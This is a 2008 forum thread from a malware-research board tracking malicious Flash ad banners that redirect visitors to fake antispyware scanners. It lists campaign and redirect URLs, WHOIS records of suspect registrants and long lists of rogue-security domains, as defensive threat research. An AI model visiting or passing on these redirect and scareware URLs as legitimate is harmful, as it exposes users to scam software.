B.I.S.S. Forums > Flash Mystery

B.I.S.S. Forums > Malware News , Research & Removal > Malware Playground

Pages: 1, 2, 3, 4

Kimberly

Apr 17 2008, 11:54 PM

Google AdSense

2 days ago a particular post did catch my attention. Please take some time to read and analyse every phrase in depth. Bold emphasis is mine; they will compose keywords and reveal the reason of this write up.

An Apology and a Request for Help.

QUOTE
Over the weekend, on Saturday, April 5, 2008, one of our features, I is Stewpid, hit the Digg.com front page. Though we have been there before, this instance was unique in that a few spyware redirects (from TheMishMash.com, not Digg.com) were reported.

We hoped to draw attention to these reports for two reasons:

1. We hate spyware too and we wanted to apologize to the affected users; and

2. We are not tech-savy and we need help finding out how this happened. We DON'T want it happening again.

For you sleuths then, here is what we know:

a. First, our website is run and hosted on TypePad, a reputable and easy-to-use blogging platform.

b. The numbers of visitors affected was small. Though on Saturday and Sunday our approximate pageviews exceeded 170,000 there were only 35 to 40 comments/complaints about spyware, pop-up's, redirects, etc. In fact, none of us here could recreate the problem.

c. According to some Digg reader comments, affected users, after visiting the I is Stewpid page, were presented with a misleading popup. It further appears that a few were then directed to (DO NOT VISIT) imunizator.com. One Digg user mentioned as a possible cause "an .swf file from [again DO NOT VISIT] promoplexer.com." A third user said he/she was redirected to [DO NOT VISIT] antispywaredeluxe.com.

d. Shortly after we learned what was reported, we immediately contacted Google AdSense, a TheMishMash.com advertising provider, and requested assistance. We further blocked AdSense from displaying ads from imunizator.com, promoplexer.com and antispywaredeluxe.com. We do not, however, yet know whether any even advertise on AdSense.

e. The problem seemed to affect only visitors coming from Digg.com.

f. To our knowledge we have never approved pop-up advertising, whether through AdSense or otherwise, though we intend on Monday to verify that.

Obviously we have no idea at this point who, if anyone, or what, was to blame. It very well could have been something we did wrong; we just don't yet know.

The long and short of it? To the Digg users who were affected, we are sorry. To those readers with expertise and/or experience in these matters, help. Any suggestions, further information, clues, etc. is appreciated.

Everyone reading these pages and Sandi's blog will know the meaning of most bolded words and symptoms except maybe for Google AdSense. Why did I include it?

If you visit TheMishMash homepage, you will see a flash animation either on the right side and /or after the first blog post, so your thoughts will be “Hey dude that was a quick one to figure out”. Well it isn’t because if you take a peek at the source code of the page you’ll notice that they don’t serve other ads besides the Google AdSense ones.

Very important note: Below are some screenshots but the SWF file displayed is NOT malcicious, it only serves for illustration purposes.

Google advertisements are very hard to track, it's not like a banner hosted at X or Y site with a nice SWF extension. I will not explain the mechanism in depth but you get a js script from ad.afy11.net which contains the necessary details in order to display the advertisement in a "placeholder".

pagead2.googlesyndication.com/pagead/flash_ad_relay.swf being the placeholder and pagead2.googlesyndication.com/pagead/imgad?id=[removed by me] is the flash animation in this case.

No extension, no relevant name ... very difficult to spot something or to get the flash file scanned.

Since links inside malicious banners are encrypted and their click tag often redirects to the real site (emusic, colgate ...), fine tuning advertising in your Adsense panel will have no effect or very little because these type of malverts don't come directly from imunizator.com, promoplexer.com, etc ...

The impact of them eventually being seen in Google Adsense is huge; a lot of websites use Google Ads. Many of them only allow text based ads, which is good; others have only images and they represent a certain “danger”...

It isn't the first time that bad things happen through Google advertising and it certainly will not be the last time. I kinda suspected this way back by reading some reports on forums but it’s the first time I came across a website which exclusively uses Google adverts.

Unfortunately I don’t have any captures of malicious banners being showed through Google AdSense so I can’t prove anything for 100% sure right now. Maybe the people who got hit at TheMishMash used a proxy or Tor, one never knows.

One thing is important right now, no matter if you are an advertiser, an admin or a simple user, just keep your eyes wide open please. When you are a victim of a redirect, let us know, provide as much details as possible.

Thanks.

Kimberly

Apr 18 2008, 04:49 AM

New Banner

A new banner we never saw showed up. Couple of screenshots below.

Banner.

content.yieldmanager.edgesuite.net/atoms/e7/72/8c/59/e7728c59d4060354dfcdc9eb045b6995.swf

Campaign.

staticglobalsources.com/crossdomain.xml

staticglobalsources.com/c/index.php? id=d1BMYXJCR0gzcHJDaW5rS0NkQzVoPTEyMDgyNzE0ODEmcG56Y252dGE9cWJ6dmm7NkiZuYXFlbAYN
kiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=domisandry&adid=intl

______________________________

The malicious banner is an advertisement for Driveway.com, an Online File Sharing website to send large files.

Kimberly

Apr 18 2008, 05:38 PM

www.clubic.com & www.jeuxvideo.fr - Colgate

Colgate banner going live on the french websites www.clubic.com and www.jeuxvideo.fr. The banner was first reported on 14th April 2008 by Sandi.

Screenshots in situ.

Note: The redirects occurs immediately as the malicious banner is present on the homepage.

Banner.

im2.smartadserver.com/272091/maxfresh_300x250_mark.swf

Campaign.

adtds2.promoplexer.com/statsa.php?campaign=mark&u=1208537690314

We also hit www.adsraise.com/mbuyers/statistics.html

Kimberly

Apr 22 2008, 06:23 PM

community.livejournal.com

Reported by Sandi here.

Banner.

sixapart-images.adbureau.net/sixapart/041808_728x90_765.swf

Campaign.

statgroup.net/crossdomain.xml
statgroup.net/c/index.php?id=[removed]
profitabill.com/?cmpid=andirector&adid=x
prevedmarketing.com/?tmn=mwatmp&aid=andirector&lid=x&ax=1&ed=2&mt_info=5951_7523_2358
scanner2.malware-scan.com/18_swp/?tmn=null&aid=andirector_ma18s_mb1t&lid=x&affid=&ax=1&ed=2&mt_info=5951_7523_2358:3958_0_15359&rdr=1
bucksbill.com/.stats/refil.php?p=18&aid=andirector_ma18s_mb1t&lid=x&affid=keyin
statsgod.com/a/?lang=en&aid=andirector_ma18s_mb1t&lid=x&affid=keyin&prod_id=655&ref=

Not only I got hit by Malware Alarm but I also got a "prompt" for Spy-Shredder.

profitabill.com - 80.86.84.191

Website Title: None given
ICANN Registrar: ENOM, INC.
Created: 2008-03-25
Expires: 2009-03-25
Name Server: NS1.PROFITABILL.COM (has 1 domains)
Name Server: NS2.PROFITABILL.COM
Name Server: NS3.PROFITABILL.COM
Name Server: NS4.PROFITABILL.COM
Whois Server: whois.enom.com
Server Type: nginx
IP Location - Berlin - Berlin - Webperoni Gmbh Server Hosting
Dedicated Hosting: profitabill.com is hosted on a dedicated server

Registrant Contact:
noo
Serg Moons
moon.serg(at)gmail.com
+1.123456
Fax: +1.123456
st.1st
as, CA 90210
US
______________________________

You may notice that this time the domain is registered by Serg Moons aka "noo" and not Serge Moon as we saw on Mar 12 2008. The email addy is identical.

Registrant Contact Information :
Serg Moon
moon.serg(at)gmail.com
Krokus str.
Amsterdam
NL
NL
31 334558757

"Serg Moon" owns about 19 other domains
moon.serg@gmail.com is associated with about 28 domains

profitabill.com

Registrant Contact:
noo
Serg Moons
moon.serg(at)gmail.com
+1.123456
Fax: +1.123456
st.1st
as, CA 90210
US

"noo" owns about 73 other domains
moon.serg(at)gmail.com is associated with about 91 domains

moon.serg(at)gmail.com

He sure is a busy person. We already found 28 IP's in March. Below is a list of domains registred at the same date as profitabill.com.

83.149.115.150

Adsadvertisment.com
Advertismentad.com
Advertprofit.net
Bizadsonline.net
Bizadvert.net
Centsprofit.com
Clickcentral.net
Clicksapce.com
Connectionclick.net
Greatad.net
Greatprofit.net
Marketingstorage.net
Marketmediapro.net
Marketonlineget.net
Prevedcentral.net
Revenueexplorer.net
Securityclick.net
Virtualcoin.net
Webpreved.com

28 + 19 for moon.serg(at)gmail.com (19/73 for "noo") ... Still way to go; but maybe I might digg up some more in the upcoming days ... who knows.

Kimberly

Apr 23 2008, 12:17 AM

statsgod.com - 84.243.253.220

Hmm, noticed I never really looked at statsgod.com before, so here's the listing. On Dec 21 2007 we already had the 8 first domains sitting on the same IP.

ICANN Registrar: TUCOWS INC.
Created: 2007-05-18
Expires: 2008-05-18
Name Server: NS1.STATSGOD.COM (has 1 domains)
Name Server: NS2.STATSGOD.COM
Whois Server: whois.tucows.com
Server Type: lighttpd/1.4.13
IP Location - Noord-holland - Amsterdam - Gfx-cust-worldstream

Registrant:
Statsgod Inc.
5439 Leesburg Park
Arlington, VA 22201
US

Domain name: STATSGOD.COM

Administrative Contact:
Hostmaster, Statsgod Inc.
5439 Leesburg Park
Arlington, VA 22201
US
(703) 379-0588

Domain servers in listed order:
NS1.STATSGOD.COM 84.243.253.219
NS2.STATSGOD.COM 84.243.253.216

Websites.

Anonymbrowser.com
Blablahost.com
Errordigger.com
Errorinspector.com
Internetsupernanny.com
Passwordinspector.com
Performanceoptimizer.com
Sellmosoft.net
Statsgod.com

profitabill.com NS servers

ns1.profitabill.com 208.79.82.50
http://www.robtex.com/ip/208.79.82.50.html

ns2.profitabill.com 208.79.82.66
http://www.robtex.com/ip/208.79.82.66.html

ns3.profitabill.com 77.73.98.2
http://www.robtex.com/ip/77.73.98.2.html

ns4.profitabill.com 77.73.98.4
http://www.robtex.com/ip/77.73.98.4.html

Spot the difference ...

I need a Whois break because my head is spinning. Sandi called them lazy ... let's add rippers to that. I found back some real banners a few days ago. Left side is the fake / bad advertisement, right side is the real advertisement. Spot the difference like they say ...

Kimberly

Apr 23 2008, 05:16 AM

scan.antispywaredeluxe.com - 67.205.93.97

Another change very soon ?

scan.antispywaredeluxe.com/scan.php?landid=[removed]&depid=[removed]&cid=[removed]&parid=[removed]&bs=[removed]1&lang=[removed]

scan.antispywaredeluxe.com A 67.205.93.97
antispywaredeluxe.com A 67.205.75.9
ns1.us.editdns.net 74.52.212.235
ns2.us.editdns.net 72.249.105.234
ns3.us.editdns.net 64.251.10.77
ns.antispywaredeluxe.com 67.205.75.9

Kimberly

Apr 23 2008, 06:28 PM

Ressurected banner

Reported by Sandi.

Campaign.

burnads.com/crossdomain.xml
burnads.com/stats.php?campaign=heldthin&u=[removed]

Check your ActiveX settings

A Google search revealed quite a few people who got this scam actually installed. Some websites push the install of an ActiveX control before triggering the download of a file. Do not accept the install of the ActiveX control and cancel the download of the file. Don't see any of the prompts below ? It's time to check your Internet Explorer settings then.

Check and secure your Internet Explorer.

From within Internet Explorer click on the Tools menu and then click on Options.
Click on the Security tab
Click the Internet icon so it becomes highlighted.
Click on Default Level and click Ok.
Click on the Custom Level button.
- Change the Download signed ActiveX controls to Prompt.
- Change the Download unsigned ActiveX controls to Disable
- Change the Initialise and script ActiveX controls not marked as safe to Disable.
- Change the Lauching of applications and unsafe files to Prompt.
Additional security settings.
- Change the Installation of desktop items to Prompt.
- Change the Launching programs and files in an IFRAME to Prompt.
- Change the Navigate sub-frames across different domains to Prompt.
- Change the Software channel perrmissions to Medium Safety.
- Internet Explorer 7 users : Check all other items and make sure that they meet the (recommended) setting when applies.
- When all these settings have been made, click on the OK button.
- If it prompts you as to whether or not you want to save the settings, press the Yes button.
Next press the Apply button and then the OK to exit the Internet Properties page.

How to Configure Enhanced Security Features for Internet Explorer from Windows XP SP2.

Just as a reminder ... these redirects affect ALL browsers (Firefox, Opera, Internet Explorer ... Mac users) so check your settings and take the appropriate steps.

Kimberly

Apr 26 2008, 10:02 PM

Lady SpeedStick "overflow"

Lady SpeedStick malvert at it again on Yahoo - caught by Sandi.

References.

http://msmvps.com/blogs/spywaresucks/archi...26/1604820.aspx
http://msmvps.com/blogs/spywaresucks/archi...26/1605158.aspx
http://msmvps.com/blogs/spywaresucks/archi...26/1605247.aspx

Yahoo redirects are not recent, a google search reveals a lot of victim posts and I also asked for feedback a couple of months ago - Ref.

QUOTE
traveltray.com/swf/gnida.swf?campaign=upmorpheus&u=1201009699
Reported at forum.zeusnews.com - forum.ingegneri.info.
Banned Country Codes - States / Cities - IP Ranges
217.12.0.0-217.12.255.255 (Yahoo Europe)
216.109.0.0-216.109.255.255 (us.rd.yahoo.com - 216.109.118.82)
66.94.0.0-66.94.25.255 (f3.yahoofs.com - 66.94.226.22)
UK
california
milano, milan, london, dublin, barcelona
In different countries (France, Italy ...) people complain about SWF redirects in their mailbox. If you are a victim of this, please contact us.

As the title says, we got an overflow of that advertising banner, it popped up everywhere in the last weeks.
______________________________

I'm curious, I often read my own notes in order to see if I didn't omit a detail or simply to refresh my memory and today, dunno why, some things in the URL's started to catch my attention.

imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/ReachWe_LB_10981A/123_728x90.swf

nztv.prod.untd.com/RealMedia/ads/Creatives/ISP/MWS_Getfreecar_LBLINT_2_8671/gfc_728x90.swf

nztv.prod.untd.com/RealMedia/ads/Creatives/ISP/MWS_GetFreeCar_LBLINT_6_8671/getfreecar728x90_REVISED_07052006.swf

63.225.61.4:8080/ads/Forceup/onentirely728x90.swf

imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/ReachWe_LB_10981A/123_728x90.swf

ReachWe

ReachWe ...

From: New Type Of Fraud: Fake Advertisers

QUOTE
Greetings,

My name is Frank Collins, my position is Director of Media Purchases. I am writing you on behalf of an Advertising Agency “ReachWe”, with headquaters in Geneve, Switzerland. We are currently in the process of developing an alternative sources of traffic for our clients. Our objective, much like yours, is to help our clients reach their marketing goal and provide them with best media coverage of their products or service available on the Web.

In present we want to utilize target markets of North America, United Kingdom and Australia. In addition to these markets we strongly work with Western Europe and might be interested in Asian Markets. We would like to hear more about your traffic details, available media objects and prices. Given this information we will be able to choose the best client from for possible campaign.

The budgets for our campaigns are usually very flexible. Some of our key partners are names like: FedEx, Expedia, Avon, and Bosch to name a few. You will find my contact information below. Thanks for your time and consideration.

Frank Collins,
Director of Media Purchases
ReachWe LLC.
http://reachwe.com/
Rue Plantamour 25
1201 Geneve, Switzerland

Reachwe.com - 203.142.29.76

Website Title: Reach Western Europe - Advertising Agency
ICANN Registrar: TUCOWS INC.
Created: 2007-12-06
Expires: 2008-12-06

Name Server: NS1.HOSTICA.COM (has 15,943 domains)
Name Server: NS2.HOSTICA.COM
Name Server: NS3.HOSTICA.COM
Whois Server: whois.tucows.com

Server Type: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
IP Location - Hong Kong (sar) - Hong Kong - Webvisions (hong Kong) Ltd

Registrant:
Sphere
Falores
Athens, NA NA
GR

Domain name: REACHWE.COM

Administrative Contact:
Martin, Sten smith.realty@yahoo.com
Falores
Athens, NA NA
GR
+46.348675543 Fax: +46.348675543

Technical Contact:
Administration, Domain billing@hostica.com
21143 Hawthorne Blvd. #442
Torrance, CA 90503-4615
US
+1.3102120190 Fax: +1.8667684101

Registration Service Provider:
Hostica.Com, support@hostica.com
+1.3102120190
+1.8667684101 (fax)
http://www.hostica.com
Please contact for help regarding your Domain

Registrar of Record: TUCOWS, INC.
Record last updated on 06-Dec-2007.
Record expires on 06-Dec-2008.
Record created on 06-Dec-2007.

Domain servers in listed order:
NS2.HOSTICA.COM
NS3.HOSTICA.COM
NS1.HOSTICA.COM

Registrant Search:

"Sphere" owns about 55 other domains

Email Search:

smith.realty@yahoo.com is associated with about 9 domains
billing@hostica.com is associated with about 7,490 domains
support@hostica.com is associated with about 19,054 domains

______________________________

These variables include:

state
city area
day
hour
browser type
operating system
domain name
IP
Language

Huhu ... sounds familiar ain't it.

What worries me ...

Mobile Marketing
WAP Media
SMS Marketing
Premium SMS, short codes and keywords
Bar Code technologie via SMS
Mobile-enabled online ad units

Websites.

P-mediaonline.com
Reachwe.com

New kid on the block - P-mediaonline.com

P-mediaonline.com - 203.142.29.76

Website Title: Reach Western Europe - Advertising Agency
ICANN Registrar: ENOM, INC.
Created: 2008-04-07
Expires: 2009-04-07

Name Server: NS1.HONGKONG5.COM (has 95 domains)
Name Server: NS2.HONGKONG5.COM
Whois Server: whois.enom.com

Server Type: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
IP Location - Hong Kong (sar) - Hong Kong - Webvisions (hong Kong) Ltd

Registration Service Provided By: Internet and Software Limited
Contact: info@issltd.biz

Domain name: p-mediaonline.com

Registrant Contact:

Thomas Canbera (lucas.martin68@gmail.com)
+380.14157364859
Fax:
Rue Plantamour 45
South Tahoe, 90001
UA

Administrative Contact:

Thomas Canbera (lucas.martin68@gmail.com)
+380.14157364859
Fax:
Rue Plantamour 45
South Tahoe, 90001
UA

Technical Contact:

Thomas Canbera (lucas.martin68@gmail.com)
+380.14157364859
Fax:
Rue Plantamour 45
South Tahoe, 90001
UA

Name Servers:
NS1.HONGKONG5.COM
NS2.HONGKONG5.COM

Creation date: 07 Apr 2008 08:54:46
Expiration date: 07 Apr 2009 08:54:46

Registrant Search:

"Thomas Canbera" owns about 3 other domains

Email Search:

info@issltd.biz is associated with about 5,796 domains
lucas.martin68@gmail.com is associated with about 1 domain

Err ... looks familiar no ?

Reminder

Check your creative at AdopsTools.
Look up in depth the Whois details of the advertising company.
Seek / ask for advise and / or help if in doubt. You may contact me or Sandi for example, we don't bite.

Kimberly

Apr 27 2008, 04:38 AM

More ReachWe ... well sort off

Google revealed another reachwe.com email addy and thus another site. First of all something important, the site nagivation on Reachwe.com and P-mediaonline.com happens through a Flash file as a matter of fact. (See screenshots from previous post). The link in the address Bar is very important as you will notice below.

The Flash file shows Face-It Studio.

"Contact Us" reveals:

Reach Western Europe
Turebergs Alle
Stockholm
Sweden
Dean Taren - dean@reachwe.com

The homepage is much more questionable...

pussy-juice.net - 208.179.130.78

Website Title: Free porn video, pictures

ICANN Registrar: TUCOWS INC.
Created: 2007-11-29
Expires: 2008-11-29
Registrar Status: ok
Name Server: NS1.HOSTICA.COM (has 15,943 domains)
Name Server: NS2.HOSTICA.COM
Name Server: NS3.HOSTICA.COM
Whois Server: whois.tucows.com

Server Type: Apache/1.3.41 (Unix) mod_psoft_traffic/0.2 mod_ssl/2.8.31 OpenSSL/0.9.8b
IP Address: 208.179.130.78
IP Location - California - Los Angeles - Jatek Corporation

Registrant:
Pavel Rudenkov
Brighton Beach
New York, NA na
US

Domain name: PUSSY-JUICE.NET

Administrative Contact:
Rudenkov, Pavel smith.realty@yahoo.com
Brighton Beach
New York, NA na
US
+1.2128756783 Fax: +1.2128756783

Technical Contact:
Administration, Domain billing@hostica.com
21143 Hawthorne Blvd. #442
Torrance, CA 90503-4615
US
+1.3102120190 Fax: +1.8667684101

Registration Service Provider:
Hostica.Com, support@hostica.com
+1.3102120190
+1.8667684101 (fax)
http://www.hostica.com
Please contact support@hostica.com for help regarding your Domain
Registration.

Registrar of Record: TUCOWS, INC.
Record last updated on 29-Nov-2007.
Record expires on 29-Nov-2008.
Record created on 29-Nov-2007.

Domain servers in listed order:
NS2.HOSTICA.COM
NS3.HOSTICA.COM
NS1.HOSTICA.COM

Email Search:

smith.realty@yahoo.com is associated with about 9 domains
billing@hostica.com is associated with about 7,490 domains
support@hostica.com is associated with about 19,054 domains

Kimberly

Apr 28 2008, 12:50 AM

www.moli.com - Neopets

2 unseen malverts, impersonating Neopets, are present on Moli. Moli is a networking online site for social, business and family networking like LiveJournal.

Screenshots in situ.

Banners.

atlas-ads.com/23486/728x90.swf

atlas-ads.com/23486/300x250.swf

Campaign.

track.trackads.net/statsa.php?campaign=23486&u=1209339077448
track.trackads.net/swf/gnida.swf?campaign=23486&u=1209339077448&
paramss=[removed]

track.trackads.net/statss.php?campaign=23486&u=1209339077448&
paramss=[removed]

tds.maxconvert.com/?paramss=[removed]
adtds.trackads.net/in.cgi?2&depid=[removed]&cid=[removed]&parid=[removed]&
scan.spywaredestructor.com/scan.php?landid=100&depid=&cid=&parid=&bs=1&lang=en

Both campaigns are the same.

atlas-ads.com - 67.205.93.102

Website Title: Atlas Solutions - Online Advertising: Advertiser and Publisher Ad Serving Solutions
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-04-10
Expires: 2009-04-10
Registrar Status: clientTransferProhibited
Name Server: NS1.ATLAS-ADS.COM (has 1 domains)
Whois Server: whois.estdomains.com

Server Type: Microsoft-IIS/6.0
IP Location - Canada - Groupe Iweb Technologies Inc

Domain Name: ATLAS-ADS.COM

Registrant:
Atlas Advertising
Atlas Advertising (support@atlas-ads.com)
Okland
SF
California,10001
US
Tel. +235.122454875
Fax. +235.122454875

Administrative Contact:
Atlas Advertising
Atlas Advertising (support@atlas-ads.com)
Okland
SF
California,10001
US
Tel. +235.122454875
Fax. +235.122454875

Technical Contact:
Atlas Advertising
Atlas Advertising (support@atlas-ads.com)
Okland
SF
California,10001
US
Tel. +235.122454875
Fax. +235.122454875

Billing Contact:
Atlas Advertising
Atlas Advertising (support@atlas-ads.com)
Okland
SF
California,10001
US
Tel. +235.122454875
Fax. +235.122454875

Domain servers in listed order:
ns1.atlas-ads.com

Creation Date: 10-Apr-2008
Expiration Date: 10-Apr-2009

Websites.

Atlas-ads.com
Trackads.net

Don't get fooled when you visit the homepage of atlas-ads.com, they don't have a homepage but redirect you to Atlas Solutions which is owned by Microsoft.

CODE

Sending request:
GET / HTTP/1.1
Host: atlas-ads.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: close

• Finding host IP address...
• Host IP address = 67.205.93.102
• Finding TCP protocol...
• Binding to local socket...
• Connecting to host...
• Sending request...
• Waiting for response...

Receiving Header:
HTTP/1.1·302·Found(CR)(LF)
X-Powered-By:·PHP/5.2.5-3(CR)(LF)
Location:·http://atlassolutions.com(CR)(LF)
Content-type:·text/html(CR)(LF)
Content-Length:·0(CR)(LF)
Connection:·close(CR)(LF)
Date:·Mon,·28·Apr·2008·00:31:14·GMT(CR)(LF)
Server:·lighttpd/1.5.0(CR)(LF)
(CR)(LF)

Kimberly

Apr 29 2008, 01:34 AM

Yahoo & Lady Speedstick

It was a busy day exchanging information with Yahoo ... but the banners "seem" to be down. We are still waiting for an official confirmation though.

Moli & Neopets

I just checked back and unfortunately I can't bring you good news about these malverts. They are still up and running and appear everywhere.

On the International Page ....

On the homepage ... We clearly see the redirect happen, track.trackads.net is listed in the status bar.

A new tab pops up.

When we click on the tab, the fake warning shows up.

The fake scanner in action.

Just for information ... fully updated OS and Internet Explorer.

New banner

Sandi discovered a new malicicous banner for americansingles.com
Ref

windowsxp-privacy.net - 84.252.148.213

windowsxp-privacy.net has been created the same day as xp-vista-update.net
Ref

Website Title: Google
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-03-25
Expires: 2009-03-25
Registrar Status: clientTransferProhibited
Name Server: MANAGEDNS1.ESTBOXES.COM (has 8,101 domains)
Name Server: MANAGEDNS2.ESTBOXES.COM
Name Server: MANAGEDNS3.ESTBOXES.COM
Name Server: MANAGEDNS4.ESTBOXES.COM
Whois Server: whois.estdomains.com

Server Type: gws
IP Location - Russian Federation - Mc Host.ru
Dedicated Hosting: windowsxp-privacy.net is hosted on a dedicated server.

Kimberly

Apr 29 2008, 02:39 AM

atlas-ads.com - Colgate

2 new Colgate banners hosted on atlas-ads.com. This is the same website as the Neopets banners.

Banners.

atlas-ads.com/89000/728x90.swf

atlas-ads.com/89000/300x250.swf

Campaign.

tracktrack.trackads.net /statsa.php?campaign=89000

The 300x250 malvert was spotted this weekend on Zap2It.com. It has been removed by the administrators.
Ref

Kimberly

Apr 29 2008, 03:57 PM

Yahoo

Official confirmation.

The malicious advertisements have been taken down by Yahoo on 28 th April 2008 at 5:30 PM GMT.

Kimberly

Apr 29 2008, 06:01 PM

IP Updates

190.15.73.254

Antivirus-scanner.com
Antivirussecuritypro.com
Bestadmedia.com
Bestpharmacydeals.com
Bestshopz.com
Bestwnvmovies.com
Bucksinsoft.com
Cancerno.com
Cashloanprofit.com
Casinodealsgalore.com
Cheap-auto-deals.com
Co-search.com
Deuscleanerpay.com
Favouriteshop.com
Fileprotector.com
Firstsecondsearch.com
Freepcsecure.com
Freetvnow.net
Great4mac.com
Greyhathosting.com
Hebooks-service.com
Infyte.com
Installprovider.com
Internetadaultfriend.com
Keywordcpv.com
Libresystm.com
Magicsearcher.com
Malware-crush.com
Manage-search.com
Marketingdungeon.com
Mediatornado.com
Mightyfaq.com
Misc-search.com
Mobilesoftmarketing.com
Moneypalacecash.com
Myfavouritesearch.com
Myhealth-life.org
Myonlinefinance.com
Mytravelgeek.com
Netturbopro.com
Nextlastsearch.com
Onestopshopz.com
Opensols.com
Pcsoftw.com
Pcsupercharger.com
Popsmedia.com
Popupnukerpro.com
Prenetsearch.com
Privacy-scan.com
Prizesforyou.com
R2d2adverising.com
Roller-search.com
Rombic-search.com
Searchcolours.com
Sellmoresoft.com
Shopshot.com
Softwcs.com
Stratosearch.com
Swiftcleaner.com
Tallgrass-seach.com
Vitecmedia.com
Windefender.com
Wontu-search.com
Yourteacheronline.com
Zappinads.com
Zooworld-search.com

c-net 190.15.73
http://www.robtex.com/cnet/190.15.73.html
______________________________

antispywaremaster.com has moved.

89.18.181.100

Server Type: nginx/0.5.32
IP Location - Noord-holland - Amsterdam - Ion

Acchiappavirus.com
Adiosvirus.com
Ahorrememoria.com
Allertaminacce.com
Altalimpeza.com
Anonimutente.com
Antiamenazas.com
Antiespiamaestro.com
Antievidence.com
Antispionimaestro.com
Antispywareconductor.com
Antispywaremaster.com
Antispywaremeister.com
Antivirusfiable.com
Antivirusforall.com
Antivirusforalla.com
Antivirusfueralle.com
Antivirusmagique.com
Antivirusparatodos.com
Apagahistorico.com
Apolloantivirus.com
Archivoprotector.com
Archivosenestado.com
Atemaiserro.com
Atrapavirus.com
Aucunchoixpourvirus.com
Aucunefaute.com
Aucuninfection.com
Aucunmenace.com
Aucunserreurs.com
Avcompleto.com
Avsecurityplus.com
Avseguro.com
Bandoaivirus.com
Barreraintegral.com
Bastioneantivirus.com
Beskyttelseonline.com
Bestsellerantivirus.com
Blanchdisc.com
Borresuspasos.com
Bossedeserreurs.com
Brossedesfautes.com
Bugseraser.com
Caiforavirus.com
Ceroamenazas.com
Cerovirus.com
Chasseurdeserreures.com
Chaubugs.com
Cleanerpotente.com
Cleanpctool.com
Cleanuptool.com
Confidentsurf.com
Contenidoseguros.com
Contenteraser.com
Controledemenaces.com
Curerrores.com
Dataconfidentiality.com
Defensaantivirus.com
Defensecelebre.com
Defensededriver.com
Defensedinformation.com
Defensedudisque.com
Defensenetsurfage.com
Defensivesystem.com
Dejitarufukugen.com
Dejitarukyoikira.com
Dejitaruwakuchin.com
Detapurotekuta.com
Detaripea.com
Detectaerrores.com
Discoseguro.com
Diskassistent.com
Diskretter.com
Disksaeuberung.com
Disksizesaver.com
Disukushuri.com
Doubledefender.com
Driversecurise.com
Einwandfreierpc.com
Eliminadordeamenazas.com
Emperahogo.com
Enmiendaerrores.com
Equipoantiespia.com
Eracheisa.com
Erasutoppu.com
Erreurchasseur.com
Errorfighter.com
Essentialeraser.com
Expertdantispyware.com
Exterminadordevirus.com
Extremuclean.com
Fairukyua.com
Feilvakt.com
Fejlfripc.com
Ferramentadesolucao.com
Festplattencleaner.com
Festplattentool.com
Filtredetraces.com
Filtrototal.com
Fixthemnow.com
Foutenwacht.com
Guardiandelaprivacidad.com
Guardianodelpc.com
Gubbishremover.com
Hackerstaisaku.com
Hadodoraibugado.com
Harddriveguard.com
Historialout.com
Inhaltsaeuberung.com
Inhaltspeicher.com
Inmunepc.com
Kakujitsutsuru.com
Keinespurenlassen.com
Knowhowprotection.com
Konsekiauto.com
Kontentsufiruta.com
Kurinkonseki.com
Kyoiireza.com
Kyoikanshi.com
Kyoryokucleaner.com
Laufwerkcleaner.com
Limpiapc.com
Limpietodo.com
Lomejorenantivirus.com
Longlifepc.com
Maechtigerreiniger.com
Malwareschutz.com
Manutencaopc.com
Menacecontrole.com
Menacescrubber.com
Menacesprotection.com
Mightycleaner.com
Minnesparere.com
Monitordeamenazas.com
Moteurpcpro.com
Mycontentassistant.com
Netsurfageassure.com
Nettoyeurdepc.com
Nettoyeurdeserreures.com
Nettoyeurpuissant.com
Neuerantivirus.com
Neuerschild.com
Nientetracce.com
Nouvelantivirus.com
Nurdeinpc.com
Ohnespurensurfen.com
Onlinehelpmate.com
Onlineverktyg.com
Onrainpurotekuta.com
Ordureffaceur.com
Oruripea.com
Pasderreurs.com
Pasdesfautes.com
Pasdesmenaces.com
Pasendommagement.com
Pasplusdespertes.com
Pasplusdevirus.com
Pcantiviruspro.com
Pcassertor.com
Pcbewaker.com
Pcboosterpro.com
Pcbunan.com
Pcforfender.com
Pchealthkeeper.com
Pchjaelper.com
Pcinforedder.com
Pckairyo.com
Pclibredevirus.com
Pcohnespuren.com
Pcpropre.com
Pcredskab.com
Pcsansbug.com
Pcsecuresystem.com
Pcsecurise.com
Pcsentineru.com
Pcsiemprenueva.com
Pctoolpro.com
Pcultralimpia.com
Pcvirussweeper.com
Perfektantivirus.com
Personalityprotector.com
Poseidonantivirus.com
Poupememoria.com
Preservingtool.com
Privacidadgarantizada.com
Privacidadyseguridad.com
Privacyredder.com
Privacywaker.com
Privacywarrior.com
Proteccionasegurada.com
Proteccioncompleta.com
Proteccionimperial.com
Protecteurdinfo.com
Protectionconue.com
Protectiondedriver.com
Protectiondenetsurfage.com
Proteggidati.com
Protezioneesperta.com
Protezionefidata.com
Pulituraestrema.com
Puraibashihosho.com
Puraibashitoshinrai.com
Rendimientototal.com
Rensanu.com
Reparaerrores.com
Reparateurdesysteme.com
Reparemenaces.com
Rimuoviciarpame.com
Riservatezzanet.com
Safeharddrive.com
Safudaijoubu.com
Salvaspaziosudisco.com
Sansendommagement.com
Sansinfections.com
Sayonarabaggu.com
Schijfbewaker.com
Schijfcontroleur.com
Schijfredder.com
Schijfruimteredder.com
Schutzderdaten.com
Schutzfuerpc.com
Secretissimosoft.com
Secretopertutti.com
Secretosasalvo.com
Secretoseguro.com
Securepcclean.com
Securepccleaner.com
Securepcnaki.com
Sefunahimitsu.com
Sekretessforsvarare.com
Selvascreensaver.com
Senzadoppioni.com
Shingaidome.com
Shinraipafomansu.com
Shisutemudifensu.com
Sichererantivirus.com
Sikkersystem.com
Sinataques.com
Sinrrastros.com
Sinsenales.com
Sistemaprotegido.com
